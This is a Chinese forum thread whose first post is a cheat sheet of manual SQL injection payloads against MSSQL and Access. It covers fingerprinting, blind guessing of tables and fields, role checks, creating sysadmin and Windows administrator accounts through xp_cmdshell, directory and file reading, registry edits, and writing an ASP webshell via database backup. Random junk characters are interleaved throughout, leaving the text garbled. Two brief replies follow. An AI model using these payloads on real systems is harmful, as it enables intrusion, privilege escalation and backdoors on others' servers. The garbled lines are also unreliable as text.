社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4465阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 NHF?73:  
  2.初步判断是否是mssql ;and user>0 QA(,K}z~^S  
,f+5x]F?m  
  3.注入参数是字符'and [查询条件] and ''=' 1#<E]<='t  
w0!,1 Ry  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' hI8C XG  
g4 X,*H  
  5.判断数据库系统 #U}U>4'  
,no:6&#  
  ;and (select count(*) from sysobjects)>0 mssql WL Lv a<{  
$hQg+nY.  
  ;and (select count(*) from msysobjects)>0 access Snu;5:R  
DV\ei")  
g8"7wf`0k  
+_dYfux  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 \xxVDr.  
i 8Xz  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 '[8b0\  
:gq@/COo(  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 o z{j2%  
{ NJ>[mKg  
  9.(1)猜字段的ascii值(access) v`BG1&/|  
Bedjw =B  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ]P$DAi   
<\g&%c,   
  (2)猜字段的ascii值(mssql) ~,68S^nP)H  
CJixK>Y^  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ~bTae =FP  
;x^,t@ xge  
  10.测试权限结构(mssql) S\5k' ifh  
+[ /r^C  
NCFV  
y UAn~!s  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ue"?S6  
';, Bn9rv  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- {7>CA'>  
Q;O)>K  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ~x"79=!W  
Rl4zTAI  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- c/Yi0Rl)  
WnzPPh3PJ  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- JvL'gJ$70  
)K>@$6H +2  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- q{/Jw"e  
5Y=\~,%\oH  
  ;and 1=(select IS_MEMBER('db_owner'));-- Gc!8v}[7J  
s;7qNwYO  
:V~*vLvR  
c dbSv=r  
  11.添加mssql和系统的帐户 wrYQ=u#Z  
rDX'oP:  
  ;exec master.dbo.sp_addlogin username;-- v-fi9$#^  
  ;exec master.dbo.sp_password null,username,password;-- o`mIi  
hO.G'q$V  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- d5"EvT  
8]":[s6x  
  ;exec master.dbo.xp_cmdshell 'net user username password P`dHR;Y0  
@) ZO$h  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- RIEv*2_O  
1bZiPG{  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- pptM &Y  
MlK`sH6  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- zWs*kTtA  
qf`xH"$  
`u\z!x'  
!NLvo_[Y  
  12.(1)遍历目录 DsJn#>?Kh  
yCCw<?  
  ;create table dirs(paths varchar(100), id int) TUUE(sLA  
.q`H`(QM  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' r`R~{;oT  
2HGD{;6>v{  
  ;and (select top 1 paths from dirs)>0 G7A bhb,  
N@*wi"Q  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) V<2fPDZ  
w;@25= |  
/rxltF3  
JkDPuTXD  
  (2)遍历目录 Lp`<L-s  
xGEmrE<;  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ^ ]qV8  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 2\63&C^  
f\);HJbg  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ?QSx8d  
Ivt} o_b*  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 [TK? P0  
Wx?&igh  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 I\rZk9F  
::OFW@dS  
>mFX^t_,  
x`+ l#  
  13.mssql中的存储过程 l IVxW+  
w"a 9'r  
  xp_regenumvalues 注册表根键, 子键 L;S*.Ol>  
4l ZJb  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 HKiVEg  
)'!ml  
  xp_regread 根键,子键,键值名 kV\-%:-  
Ue3B+k9w  
  ;exec xp_regread ?S@R~y0K  
}-{b$6]  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ;4kx>x*H  
te;Ox!B&  
  xp_regwrite 根键,子键, 值名, 值类型, 值 )y`TymM[F  
oB0 8  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ,.oa,sku  
r'd:SaU+  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 S@c\|  
x'2 ,sE  
  xp_regdeletevalue 根键,子键,值名 q)?p$\  
G&@-R{i  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 0n*rs=\VG  
ByhOK}u;P4  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 3|~(?4aE  
7~ *;=,mw  
gj[ >p=Wn  
R5K-KSvW  
  14.mssql的backup创建webshell u%=bHg  
niYz9YX  
  use model bk7^%O>  
&gWMl`3^*!  
  create table cmd(str image); .>kccLr:z  
t}]9VD9  
  insert into cmd(str) values (''); c>S"`r  
abICoP1zQ  
  backup database model to disk='c:\l.asp'; ,Um5S6 Z  
rT flk  
(F,(]71Z+  
(|<h^] y3  
  15.mssql内置函数 Bw 3F7W~l  
p;qRm} 0}  
  ;and (select @@version)>0 获得Windows的版本号 h-r6PY=i  
Nt zq"ces)  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa '!wPnYT@D  
^V<J69ny|9  
  ;and (select user_name())>0 爆当前系统的连接用户 AZxrJ2G  
NV8]#b  
  ;and (select db_name())>0 得到当前连接的数据库 [|a( y6Q  
;48P vw>g}  
@[d#mz  
M8^.19q;  
  16.简洁的webshell b&=]S(  
e86Aqehle  
  use model 'bB>$E  
Mx/h?}u;  
  create table cmd(str image); J16=!q()  
1Q&cVxA"\  
  insert into cmd(str) values (''); v#<\:|XAg  
2q"_^deI5*  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
温馨提示:欢迎交流讨论,请勿纯表情、纯引用!
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八